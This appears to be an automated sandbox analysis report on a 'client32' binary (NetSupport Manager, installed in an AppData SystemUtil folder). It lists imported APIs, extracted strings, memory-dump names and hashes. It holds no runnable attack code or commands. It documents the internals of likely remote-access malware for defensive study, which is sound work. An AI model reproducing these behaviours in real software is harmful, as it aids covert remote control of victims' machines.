Associated: 00000006.00000002.3138687651.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632

Non-executed Functions

Function 68C650E0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 120fileCOMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini), ref: 68C65131
wsprintfA.USER32 ref: 68C6514A
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 68C65168
GetFileSize.KERNEL32(00000000,00000000), ref: 68C65172
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini), ref: 68C65191
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 68C651B2
FlushFileBuffers.KERNEL32(00000000,?,68C69B16,00000001), ref: 68C651D8
CloseHandle.KERNEL32(00000000), ref: 68C651E4
wsprintfA.USER32 ref: 68C65225
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 68C65243
__itow.LIBCMT ref: 68C65265
WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 68C65278

Strings

maxfilesize, xrefs: 68C65182
%spacket%03d.trc, xrefs: 68C65144, 68C65219
htctl.packet_tracing, xrefs: 68C6512C, 68C65187, 68C65273
nextfileindex, xrefs: 68C65127, 68C6526E
C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini, xrefs: 68C65120, 68C65178, 68C65245
C:\Users\user\AppData\Roaming\SystemUtil\Support\, xrefs: 68C65134, 68C6520E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
String ID: %spacket%03d.trc$C:\Users\user\AppData\Roaming\SystemUtil\Support\$C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
API String ID: 2516244645-1634311277
Opcode ID: eb53daa0c3e5b6067e3ac095ac03e3cc55c1e16ab01f8bee06db6e79762c0787
Instruction ID: cfcb91910c53050daa8d6c7a6b4d284c4cb6b5d6e33b8cb75976ebd6576575cb
Opcode Fuzzy Hash: eb53daa0c3e5b6067e3ac095ac03e3cc55c1e16ab01f8bee06db6e79762c0787
Instruction Fuzzy Hash: AE418F71A80209BFEB54DF64DC86F9E37B9A74A708F804215F614B72C0EB75F9008B64

Function 68C74F30 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 192sleepCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057), ref: 68C74F6D
EnterCriticalSection.KERNEL32(68CAB898), ref: 68C74FE9
LeaveCriticalSection.KERNEL32 ref: 68C75002
_free.LIBCMT ref: 68C75086
_free.LIBCMT ref: 68C750BA
GetTickCount.KERNEL32 ref: 68C750CB
GetTickCount.KERNEL32 ref: 68C750E0
Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68C750F2
EnterCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68C75108
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68C75135
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68C7513F
SetLastError.KERNEL32(?), ref: 68C75154

Strings

LINK=%s, xrefs: 68C7507A
GSK=%s, xrefs: 68C7504F
Gateway_Gsk, xrefs: 68C74FC6
CMD=GETFILEINFO, xrefs: 68C75033

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
API String ID: 619989478-944126313
Opcode ID: 6529573862a12c760990d2a3d573c5191ae9bcb39dce655e9b9195f252fccde2
Instruction ID: 66f72a3cd38b38ba4b77cbf150191cdbe0eae57316ac9c9ebabd9fd1438612ce
Opcode Fuzzy Hash: 6529573862a12c760990d2a3d573c5191ae9bcb39dce655e9b9195f252fccde2
Instruction Fuzzy Hash: D961A375D04209EFCB20CFA8D988BEE77B4EF49359F904169E515A7280F731EA05CBA1

Function 11127110 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 400COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B

Strings

QueryServiceConfig2W, xrefs: 1112724A
advapi32.dll, xrefs: 11127226
EnumServices returned %d, xrefs: 111271F4

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
API String ID: 1889721586-3267302290
Opcode ID: 3f71f311369f89944e2e6dd7273e3b0169b5e8875ec6bdfe2952af4a623be109
Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
Opcode Fuzzy Hash: 3f71f311369f89944e2e6dd7273e3b0169b5e8875ec6bdfe2952af4a623be109
Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50

Function 1106F210 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 358sleepCOMMON

Download Yara Rule

APIs

CapiHangup.PCICAPI ref: 1106F48F
CapiClose.PCICAPI ref: 1106F494
CapiOpen.PCICAPI(00000000,00000000), ref: 1106F49D
CapiListen.PCICAPI(00000001,00000000,00000000,00000000), ref: 1106F4AB
GetTickCount.KERNEL32 ref: 1106F53A
GetTickCount.KERNEL32 ref: 1106F542
CapiHangup.PCICAPI ref: 1106F5CF
Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,000018BF,10000000), ref: 1106F5F9
GetTickCount.KERNEL32 ref: 1106F5FF
Sleep.KERNEL32(000003E8), ref: 1106F645

Strings

$DB, xrefs: 1106F58C
Dialup, xrefs: 1106F488
*MSN, xrefs: 1106F483
tapi, xrefs: 1106F4C3
..\ctl32\Connect.cpp, xrefs: 1106F4BE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Capi$CountTick$HangupSleep$CloseListenOpen
String ID: $DB$*MSN$..\ctl32\Connect.cpp$Dialup$tapi
API String ID: 1585182496-2734021829
Opcode ID: 74ef3de325968d0df488956b07f6257953592f03bacc9e67c3f9bff9792d1deb
Instruction ID: 1aecc925b5fbc5169191dead02c85a6a785123c90751e1c82bbc8ebf3e53e7af
Opcode Fuzzy Hash: 74ef3de325968d0df488956b07f6257953592f03bacc9e67c3f9bff9792d1deb
Instruction Fuzzy Hash: A6C1F775F0022A8BE710DF64DC91B9DB7A8AF44318F5081B9E55D9B2C1DE71AE80CB92

Function 110251B0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11025347
DrawMenuBar.USER32(?), ref: 1102535E
GetMenu.USER32(?), ref: 110253B3
DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

UpdateWindow.USER32(?), ref: 11025407
IsIconic.USER32(?), ref: 1102541A
SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0

Strings

m_hWnd, xrefs: 110253F6
Chat, xrefs: 110251D8
..\ctl32\chatw.cpp, xrefs: 1102520A
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110253F1

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3085788722-363603473
Opcode ID: 5e9949b81ec4ef44488bee38b5200722746b43fa6273fddd0f095c3bd1cd4de0
Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
Opcode Fuzzy Hash: 5e9949b81ec4ef44488bee38b5200722746b43fa6273fddd0f095c3bd1cd4de0
Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95

Function 1115B180 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
RemovePropA.USER32(?), ref: 1115B1E5
RemovePropA.USER32(?), ref: 1115B1F4
RemovePropA.USER32(?,00000000), ref: 1115B203

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A

Strings

..\ctl32\wndclass.cpp, xrefs: 1115B198
old_wndproc, xrefs: 1115B19D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc
API String ID: 1777853711-3305400014
Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1

Function 1105B3B0 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 400COMMON

Download Yara Rule

APIs

SetPropA.USER32(?,?,?), ref: 1105B43A

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

GetPropA.USER32(?), ref: 1105B44F
wsprintfA.USER32 ref: 1105B481
RemovePropA.USER32(?,00000000), ref: 1105B4BF

Strings

NSMClientReplayWin::m_aProp, xrefs: 1105B417
CltReplay.cpp, xrefs: 1105B3F1, 1105B412, 1105B494
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 1105B47B

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$wsprintf$ErrorExitLastMessageProcessRemove
String ID: CltReplay.cpp$NSMClientReplayWin::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 3799649539-2799116179
Opcode ID: 7d9d2d8c3e550ff45466778c24b4e32c1839308e0ddd69f6746950b92e3fe446
Instruction ID: 878e0ad0ae89c655833a3453bcd56fdaae4dff5bf5d24e0f2c31a814972bd83f
Opcode Fuzzy Hash: 7d9d2d8c3e550ff45466778c24b4e32c1839308e0ddd69f6746950b92e3fe446
Instruction Fuzzy Hash: EFC19875F0152D9BDB94CAA5DC90F7FB7AAEB84314F0041DAE90A97280DA35AD41CF70

Function 1101F360 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 1101F387
GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
GlobalLock.KERNEL32(00000000), ref: 1101F3A0
_memmove.LIBCMT ref: 1101F3A9
GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
EmptyClipboard.USER32 ref: 1101F3B8
SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
GlobalFree.KERNEL32(00000000), ref: 1101F3CC
MessageBeep.USER32(00000030), ref: 1101F3D4
CloseClipboard.USER32 ref: 1101F3DA

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
String ID:
API String ID: 3255624709-0
Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762

Function 68C91CC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,68C9232A,?,68C87F44,?,000000BC,?), ref: 68C91D00
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,68C9232A,?,68C87F44,?,000000BC,?), ref: 68C91D29
GetACP.KERNEL32(?,?,68C9232A,?,68C87F44,?,000000BC,?), ref: 68C91D3D

Strings

ACP, xrefs: 68C91CD0
OCP, xrefs: 68C91CE1

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 112749bc5183675884f1f69edf765c374d9e754095d21299b7c25c90c0f64624
Instruction ID: 16e7bf556e32a84b95153eb221b7c721030dc9aef309cb0b191ff2910b68c496
Opcode Fuzzy Hash: 112749bc5183675884f1f69edf765c374d9e754095d21299b7c25c90c0f64624
Instruction Fuzzy Hash: 3A01A73250560BFEFF028B68DC56B9E37BCBF0175DFA0849AE511E2080FB64C642C655

Function 68C828E1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 68C88BA8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 68C88BBD
UnhandledExceptionFilter.KERNEL32(68CA427C), ref: 68C88BC8
GetCurrentProcess.KERNEL32(C0000409), ref: 68C88BE4
TerminateProcess.KERNEL32(00000000), ref: 68C88BEB

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a2d9475f24f943dbc453d2b904f1e49d8b66f006e25d2161a7c0153907664b3c
Instruction ID: 6e7a99b88fde807810a37faef5c183933edf34a9c0fe7d7c251bb71847d9f4f6
Opcode Fuzzy Hash: a2d9475f24f943dbc453d2b904f1e49d8b66f006e25d2161a7c0153907664b3c
Instruction Fuzzy Hash: 9421CAB8850205DFCF40DF29E888A9E3BB4FB4A35DF40415AEA1897780EBB4D981CF05

Function 1101D180 Relevance: 4.6, APIs: 3, Instructions: 82timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1101D213
SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
GetLocalTime.KERNEL32(00000002), ref: 1101D25C

